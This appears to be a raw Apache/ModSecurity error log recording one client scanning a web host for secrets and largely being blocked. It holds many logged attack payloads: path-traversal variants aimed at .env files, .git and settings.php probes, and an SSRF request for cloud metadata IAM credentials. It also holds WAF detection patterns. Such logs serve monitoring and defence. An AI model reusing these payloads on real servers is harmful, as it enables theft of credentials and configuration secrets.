[Tue May 12 06:16:00.620173 2026] [core:error] [pid 1844863:tid 1844888] [client 45.148.10.166:35610] AH10244: invalid URI path (/%2e%2e/%2e%2e/.env)
[Tue May 12 06:16:00.634881 2026] [proxy_http:error] [pid 1820198:tid 1820214] (20014)Internal error (specific information not available): [client 45.148.10.166:35664] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 06:16:00.646737 2026] [core:error] [pid 1825179:tid 1825198] [client 45.148.10.166:35618] AH10244: invalid URI path (/static../../../../.env)
[Tue May 12 06:16:00.646883 2026] [proxy_http:error] [pid 1825287:tid 1825318] (20014)Internal error (specific information not available): [client 45.148.10.166:35700] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 06:16:00.646910 2026] [proxy:error] [pid 1825287:tid 1825318] [client 45.148.10.166:35700] AH00898: Error reading from remote server returned by /___proxy_subdomain_cpanel/_debug_toolbar
[Tue May 12 06:16:00.654281 2026] [proxy_http:error] [pid 1842385:tid 1842411] (20014)Internal error (specific information not available): [client 45.148.10.166:35584] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 06:16:00.659088 2026] [proxy_http:error] [pid 1844863:tid 1844875] (20014)Internal error (specific information not available): [client 45.148.10.166:35690] AH01102: error reading status line from remote server 127.0.0.1:2082, referer: https://cpanel.tchatbooster.com/.git/refs/heads/main
[Tue May 12 06:16:00.659114 2026] [proxy:error] [pid 1844863:tid 1844875] [client 45.148.10.166:35690] AH00898: Error reading from remote server returned by /___proxy_subdomain_cpanel/.git/refs/heads/main, referer: https://cpanel.tchatbooster.com/.git/refs/heads/main
[Tue May 12 06:16:00.663617 2026] [proxy_http:error] [pid 1808852:tid 1808856] (20014)Internal error (specific information not available): [client 45.148.10.166:35554] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 06:16:00.664836 2026] [proxy_http:error] [pid 1825179:tid 1825218] (20014)Internal error (specific information not available): [client 45.148.10.166:35648] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 06:16:00.707177 2026] [proxy_http:error] [pid 1825287:tid 1825313] (20014)Internal error (specific information not available): [client 45.148.10.166:35666] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 06:16:00.713584 2026] [proxy_http:error] [pid 1808852:tid 1808866] (20014)Internal error (specific information not available): [client 45.148.10.166:35780] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 06:16:00.713612 2026] [proxy:error] [pid 1808852:tid 1808866] [client 45.148.10.166:35780] AH00898: Error reading from remote server returned by /___proxy_subdomain_cpanel/gql
[Tue May 12 06:16:00.714418 2026] [proxy_http:error] [pid 1844863:tid 1844879] (20014)Internal error (specific information not available): [client 45.148.10.166:35644] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 06:16:00.748712 2026] [proxy_http:error] [pid 1842385:tid 1842400] (20014)Internal error (specific information not available): [client 45.148.10.166:35748] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 06:16:00.748735 2026] [proxy:error] [pid 1842385:tid 1842400] [client 45.148.10.166:35748] AH00898: Error reading from remote server returned by /___proxy_subdomain_cpanel/api/debug/
[Tue May 12 06:16:00.772794 2026] [proxy_http:error] [pid 1808852:tid 1808866] (20014)Internal error (specific information not available): [client 45.148.10.166:35780] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 06:16:00.797561 2026] [proxy_http:error] [pid 1825179:tid 1825202] (20014)Internal error (specific information not available): [client 45.148.10.166:35708] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 06:16:00.816482 2026] [proxy_http:error] [pid 1842385:tid 1842400] (20014)Internal error (specific information not available): [client 45.148.10.166:35748] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 06:16:00.922978 2026] [core:error] [pid 1842385:tid 1842409] [client 45.148.10.166:35718] AH10244: invalid URI path (/assets../../../.env)
[Tue May 12 06:16:00.948248 2026] [core:error] [pid 1842385:tid 1842404] [client 45.148.10.166:35676] AH10244: invalid URI path (/assets../../../../.env)
[Tue May 12 06:16:01.146612 2026] [core:error] [pid 1808852:tid 1808868] [client 45.148.10.166:35796] AH10244: invalid URI path (/css../../../.env)
[Tue May 12 06:16:01.170696 2026] [core:error] [pid 1820198:tid 1820207] [client 45.148.10.166:35520] AH10244: invalid URI path (/css../../../../.env)
[Tue May 12 06:16:01.186196 2026] [core:error] [pid 1825287:tid 1825318] [client 45.148.10.166:35700] AH10244: invalid URI path (/../../.env)
[Tue May 12 06:16:01.211411 2026] [core:error] [pid 1825287:tid 1825326] [client 45.148.10.166:35784] AH10244: invalid URI path (/../.env)
[Tue May 12 06:16:01.236328 2026] [core:error] [pid 1844863:tid 1844875] [client 45.148.10.166:35690] AH10244: invalid URI path (/.%00/../../.env)
[Tue May 12 06:16:01.372143 2026] [core:error] [pid 1808852:tid 1808878] [client 45.148.10.166:35616] AH10244: invalid URI path (/js../../../.env)
[Tue May 12 06:16:01.396124 2026] [core:error] [pid 1820198:tid 1820206] [client 45.148.10.166:35692] AH10244: invalid URI path (/js../../../../.env)
[Tue May 12 06:16:01.400614 2026] [proxy_http:error] [pid 1820198:tid 1820206] (20014)Internal error (specific information not available): [client 45.148.10.166:35692] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 06:16:01.417883 2026] [core:error] [pid 1844863:tid 1844881] [client 45.148.10.166:35496] AH10244: invalid URI path (/js../../../../.env)
[Tue May 12 06:16:01.610815 2026] [core:error] [pid 1844863:tid 1844883] [client 45.148.10.166:35732] AH10244: invalid URI path (/img../../../.env)
[Tue May 12 06:16:01.635050 2026] [core:error] [pid 1820198:tid 1820212] [client 45.148.10.166:35760] AH10244: invalid URI path (/img../../../../.env)
[Tue May 12 06:16:01.834336 2026] [core:error] [pid 1825179:tid 1825221] [client 45.148.10.166:35774] AH10244: invalid URI path (/media../../../.env)
[Tue May 12 06:16:01.917194 2026] [core:error] [pid 1820198:tid 1820216] [client 45.148.10.166:35804] AH10244: invalid URI path (/media../../../../.env)
[Tue May 12 06:16:02.180155 2026] [core:error] [pid 1808852:tid 1808863] [client 45.148.10.166:35814] AH10244: invalid URI path (/uploads../../../.env)
[Tue May 12 06:16:02.261138 2026] [core:error] [pid 1842385:tid 1842394] [client 45.148.10.166:35828] AH10244: invalid URI path (/uploads../../../../.env)
[Tue May 12 06:16:02.379042 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:35908] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /static../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKpgtr1yOh9TvizezitYwAAAFY"]
[Tue May 12 06:16:02.379208 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:35908] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKpgtr1yOh9TvizezitYwAAAFY"]
[Tue May 12 06:16:02.379375 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:35908] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKpgtr1yOh9TvizezitYwAAAFY"]
[Tue May 12 06:16:02.379702 2026] [security2:error] [pid 1825179:tid 1825217] [client 45.148.10.166:35866] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.tchatbooster.com"] [uri "/_next/image"] [unique_id "agKpgtr1yOh9TvizezitZAAAAFM"]
[Tue May 12 06:16:02.381414 2026] [security2:error] [pid 1844863:tid 1844887] [client 45.148.10.166:35846] ModSecurity: Warning. Matched phrase "/sites/default/settings.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sites/default/settings.php found within REQUEST_FILENAME: /sites/default/settings.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/sites/default/settings.php"] [unique_id "agKpgvaAnTZtx1_H_wzF3wAAAVI"]
[Tue May 12 06:16:02.381593 2026] [security2:error] [pid 1844863:tid 1844887] [client 45.148.10.166:35846] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/sites/default/settings.php"] [unique_id "agKpgvaAnTZtx1_H_wzF3wAAAVI"]
[Tue May 12 06:16:02.390744 2026] [core:error] [pid 1842385:tid 1842391] [client 45.148.10.166:36002] AH10244: invalid URI path (/%2e%2e/%2e%2e/.env)
[Tue May 12 06:16:02.395536 2026] [security2:error] [pid 1825179:tid 1825217] [client 45.148.10.166:35866] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/_next/image"] [unique_id "agKpgtr1yOh9TvizezitZAAAAFM"]
[Tue May 12 06:16:02.402349 2026] [security2:error] [pid 1808852:tid 1808861] [client 45.148.10.166:35872] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKpghfeipD4uoG21Fo_mQAAAAY"]
[Tue May 12 06:16:02.402539 2026] [security2:error] [pid 1808852:tid 1808861] [client 45.148.10.166:35872] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKpghfeipD4uoG21Fo_mQAAAAY"]
[Tue May 12 06:16:02.414294 2026] [security2:error] [pid 1808852:tid 1808872] [client 45.148.10.166:35934] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKpghfeipD4uoG21Fo_mgAAABE"]
[Tue May 12 06:16:02.414401 2026] [security2:error] [pid 1808852:tid 1808872] [client 45.148.10.166:35934] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKpghfeipD4uoG21Fo_mgAAABE"]
[Tue May 12 06:16:02.414458 2026] [security2:error] [pid 1808852:tid 1808872] [client 45.148.10.166:35934] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKpghfeipD4uoG21Fo_mgAAABE"]
[Tue May 12 06:16:02.414793 2026] [security2:error] [pid 1808852:tid 1808872] [client 45.148.10.166:35934] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKpghfeipD4uoG21Fo_mgAAABE"]
[Tue May 12 06:16:02.414922 2026] [security2:error] [pid 1808852:tid 1808872] [client 45.148.10.166:35934] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKpghfeipD4uoG21Fo_mgAAABE"]
[Tue May 12 06:16:02.415013 2026] [security2:error] [pid 1808852:tid 1808872] [client 45.148.10.166:35934] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKpghfeipD4uoG21Fo_mgAAABE"]
[Tue May 12 06:16:02.415611 2026] [security2:error] [pid 1808852:tid 1808872] [client 45.148.10.166:35934] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKpghfeipD4uoG21Fo_mgAAABE"]
[Tue May 12 06:16:02.704548 2026] [core:error] [pid 1825287:tid 1825304] [client 45.148.10.166:35842] AH10244: invalid URI path (/images../../../.env)
[Tue May 12 06:16:02.818106 2026] [core:error] [pid 1825287:tid 1825319] [client 45.148.10.166:36012] AH10244: invalid URI path (/images../../../../.env)
[Tue May 12 06:16:02.931759 2026] [security2:error] [pid 1820198:tid 1820218] [client 43.158.91.71:58800] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "missmandarine.com"] [uri "/"] [unique_id "agKpgs1tk6y7yBJLpJpE0QAAAJI"], referer: http://missmandarine.com
[Tue May 12 06:16:02.973230 2026] [security2:error] [pid 1844863:tid 1844887] [client 45.148.10.166:35846] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpgvaAnTZtx1_H_wzF3wAAAVI"]
[Tue May 12 06:16:02.995462 2026] [security2:error] [pid 1844863:tid 1844887] [client 45.148.10.166:35846] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.ENV"] [unique_id "agKpgvaAnTZtx1_H_wzF4wAAAVI"]
[Tue May 12 06:16:02.995652 2026] [security2:error] [pid 1844863:tid 1844887] [client 45.148.10.166:35846] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.ENV"] [unique_id "agKpgvaAnTZtx1_H_wzF4wAAAVI"]
[Tue May 12 06:16:03.054860 2026] [security2:error] [pid 1808852:tid 1808877] [client 45.148.10.166:35852] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKpgxfeipD4uoG21Fo_nAAAABY"]
[Tue May 12 06:16:03.055063 2026] [security2:error] [pid 1808852:tid 1808877] [client 45.148.10.166:35852] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKpgxfeipD4uoG21Fo_nAAAABY"]
[Tue May 12 06:16:03.223878 2026] [security2:error] [pid 1820198:tid 1820213] [client 45.148.10.166:35912] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env#"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env#"] [unique_id "agKpg81tk6y7yBJLpJpE0gAAAI0"]
[Tue May 12 06:16:03.224079 2026] [security2:error] [pid 1820198:tid 1820213] [client 45.148.10.166:35912] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env#"] [unique_id "agKpg81tk6y7yBJLpJpE0gAAAI0"]
[Tue May 12 06:16:03.225655 2026] [security2:error] [pid 1808852:tid 1808870] [client 45.148.10.166:35954] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKpgxfeipD4uoG21Fo_ngAAAA8"]
[Tue May 12 06:16:03.225790 2026] [security2:error] [pid 1808852:tid 1808870] [client 45.148.10.166:35954] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKpgxfeipD4uoG21Fo_ngAAAA8"]
[Tue May 12 06:16:03.252508 2026] [core:error] [pid 1842385:tid 1842413] [client 45.148.10.166:35874] AH10244: invalid URI path (/storage/../../../.env)
[Tue May 12 06:16:03.253827 2026] [security2:error] [pid 1820198:tid 1820223] [client 45.148.10.166:35988] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.local"] [unique_id "agKpg81tk6y7yBJLpJpE0wAAAJc"]
